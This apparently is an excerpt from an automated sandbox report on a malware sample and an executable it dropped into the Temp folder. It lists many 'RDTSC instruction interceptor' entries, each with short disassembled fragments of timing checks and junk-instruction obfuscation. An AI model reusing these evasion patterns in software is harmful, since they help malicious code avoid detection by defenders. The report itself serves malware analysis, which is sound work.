                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390A48 second address: 5390AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [760F459Ch], 05h 0x00000012 jmp 00007FF30D194DC6h 0x00000017 je 00007FF37DE92D37h 0x0000001d jmp 00007FF30D194DC0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edi, 0DE4C650h 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d popad 0x0000002e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390B68 second address: 5390B89 instructions: 0x00000000 rdtsc 0x00000002 mov di, A02Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, 00000000h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF30CF3CAF1h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 5390B89 second address: 5390BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DBDh 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0A9A second address: 53A0AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov dl, ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, B8D4h 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007FF30CF3CAF3h 0x00000019 pop esi 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AC2 second address: 53A0AE2 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 jmp 00007FF30D194DC0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AE2 second address: 53A0AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0AE8 second address: 53A0B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dl 0x0000000f mov si, 7D73h 0x00000013 popad 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0B06 second address: 53A0BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FF30CF3CAF0h 0x0000000c xor si, 1478h 0x00000011 jmp 00007FF30CF3CAEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e mov al, F7h 0x00000020 mov eax, edi 0x00000022 popad 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF30CF3CAF9h 0x0000002c and ah, FFFFFFC6h 0x0000002f jmp 00007FF30CF3CAF1h 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF30CF3CAF0h 0x0000003b adc ax, 2068h 0x00000040 jmp 00007FF30CF3CAEBh 0x00000045 popfd 0x00000046 popad 0x00000047 je 00007FF37DC2A30Eh 0x0000004d jmp 00007FF30CF3CAF6h 0x00000052 cmp dword ptr [760F459Ch], 05h 0x00000059 pushad 0x0000005a jmp 00007FF30CF3CAEEh 0x0000005f push esi 0x00000060 mov bx, A1A4h 0x00000064 pop edi 0x00000065 popad 0x00000066 je 00007FF37DC423B5h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f mov edi, 46D77528h 0x00000074 call 00007FF30CF3CAF1h 0x00000079 pop esi 0x0000007a popad 0x0000007b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BE9 second address: 53A0BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBDh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BFA second address: 53A0BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0BFE second address: 53A0C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C0F second address: 53A0C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C14 second address: 53A0C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DBAh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C50 second address: 53A0C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C54 second address: 53A0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0C93 second address: 53A0CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30CF3CAEBh 0x00000008 mov ax, 0B7Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF30CF3CAECh 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0CB9 second address: 53A0CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 53A0CC8 second address: 53A0CD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, A8h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DFFDE second address: 8DF7E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF30D194DCBh 0x00000008 jmp 00007FF30D194DC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FF30D194DBBh 0x00000015 nop 0x00000016 js 00007FF30D194DB7h 0x0000001c stc 0x0000001d push dword ptr [ebp+122D1229h] 0x00000023 xor dword ptr [ebp+122D1B72h], eax 0x00000029 call dword ptr [ebp+122D195Dh] 0x0000002f pushad 0x00000030 cld 0x00000031 xor eax, eax 0x00000033 jmp 00007FF30D194DC1h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c cld 0x0000003d jg 00007FF30D194DCCh 0x00000043 jmp 00007FF30D194DC6h 0x00000048 mov dword ptr [ebp+122D36A1h], eax 0x0000004e clc 0x0000004f jmp 00007FF30D194DBAh 0x00000054 mov esi, 0000003Ch 0x00000059 add dword ptr [ebp+122D2703h], esi 0x0000005f pushad 0x00000060 mov bx, B6F0h 0x00000064 adc ah, 00000039h 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2703h], esi 0x00000072 lodsw 0x00000074 jmp 00007FF30D194DC5h 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d cld 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DF7E1 second address: 8DF7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: 8DF7E5 second address: 8DF7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6178F second address: A61799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E55 second address: A49E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E5A second address: A49E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEEh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E6E second address: A49E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A49E72 second address: A49E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60C09 second address: A60C11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60EC3 second address: A60ED3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60ED3 second address: A60F03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF30D194DC8h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F03 second address: A60F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F07 second address: A60F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FF30D194DB6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F2A second address: A60F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF30CF3CAE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A60F3A second address: A60F44 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30D194DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A6453A second address: A645DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF30CF3CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c clc 0x0000000d push 00000003h 0x0000000f mov edx, dword ptr [ebp+122D1B78h] 0x00000015 push 00000000h 0x00000017 jmp 00007FF30CF3CAF8h 0x0000001c jmp 00007FF30CF3CAEEh 0x00000021 push 00000003h 0x00000023 mov edi, ecx 0x00000025 call 00007FF30CF3CAF4h 0x0000002a stc 0x0000002b pop ecx 0x0000002c call 00007FF30CF3CAE9h 0x00000031 jmp 00007FF30CF3CAEDh 0x00000036 push eax 0x00000037 pushad 0x00000038 jmp 00007FF30CF3CAF2h 0x0000003d pushad 0x0000003e push eax 0x0000003f pop eax 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 popad 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF30CF3CAF5h 0x00000051 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A645DF second address: A645F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeRDTSC instruction interceptor: First address: A645F6 second address: A64635 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF30CF3CAF3h 0x00000008 jmp 00007FF30CF3CAEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007FF30CF3CAEEh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF30CF3CAF2h 0x00000022 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A64635 second address: A64669 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30D194DBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov si, cx 0x0000000e mov di, si 0x00000011 lea ebx, dword ptr [ebp+12458364h] 0x00000017 movzx edi, si 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d jne 00007FF30D194DB6h 0x00000023 jnp 00007FF30D194DB6h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A64669 second address: A6467A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF30CF3CAECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A6484B second address: A6484F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A6484F second address: A64853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A6487D second address: A64883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A64883 second address: A648B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF30CF3CAE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FF30CF3CAEEh 0x00000011 jne 00007FF30CF3CAE8h 0x00000017 pushad 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 41A576A5h 0x0000001f push 00000000h 0x00000021 mov esi, 1D530DA0h 0x00000026 push 35E052F4h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jne 00007FF30CF3CAE6h 0x00000034 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A648B9 second address: A64933 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FF30D194DC0h 0x00000010 pop esi 0x00000011 popad 0x00000012 xor dword ptr [esp], 35E05274h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FF30D194DB8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 stc 0x00000034 mov ecx, dword ptr [ebp+122D365Dh] 0x0000003a push 00000003h 0x0000003c jl 00007FF30D194DBCh 0x00000042 or esi, dword ptr [ebp+122D33E9h] 0x00000048 push 00000000h 0x0000004a mov edx, dword ptr [ebp+122D1BDAh] 0x00000050 push 00000003h 0x00000052 mov edi, 6D15D702h 0x00000057 push 97303CECh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f ja 00007FF30D194DB6h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A64933 second address: A6493D instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A6493D second address: A64981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 57303CECh 0x0000000d call 00007FF30D194DBBh 0x00000012 jns 00007FF30D194DB7h 0x00000018 stc 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+12458378h] 0x00000020 jmp 00007FF30D194DC8h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8240B second address: A82413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82578 second address: A82584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A826E6 second address: A826FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF0h 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A826FB second address: A82711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82711 second address: A8272D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF30CF3CAF4h 0x0000000c pop edi 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8272D second address: A82744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF30D194DB6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d js 00007FF30D194DB6h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82876 second address: A8287A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8287A second address: A82880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82B0E second address: A82B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FF30CF3CAF2h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82C7A second address: A82C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82C7E second address: A82C9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF30CF3CAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FF30CF3CAE6h 0x00000014 jmp 00007FF30CF3CAEAh 0x00000019 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82C9C second address: A82CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82CA0 second address: A82CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82DFB second address: A82E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82E04 second address: A82E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A82E0A second address: A82E24 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF30D194DB6h 0x00000008 jmp 00007FF30D194DBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83108 second address: A8312F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF30CF3CAEDh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF30CF3CAEEh 0x00000010 jp 00007FF30CF3CAE6h 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8312F second address: A83133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83133 second address: A8314B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF30CF3CAFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FF30CF3CAE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8314B second address: A8314F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83501 second address: A83528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAECh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF30CF3CAEEh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
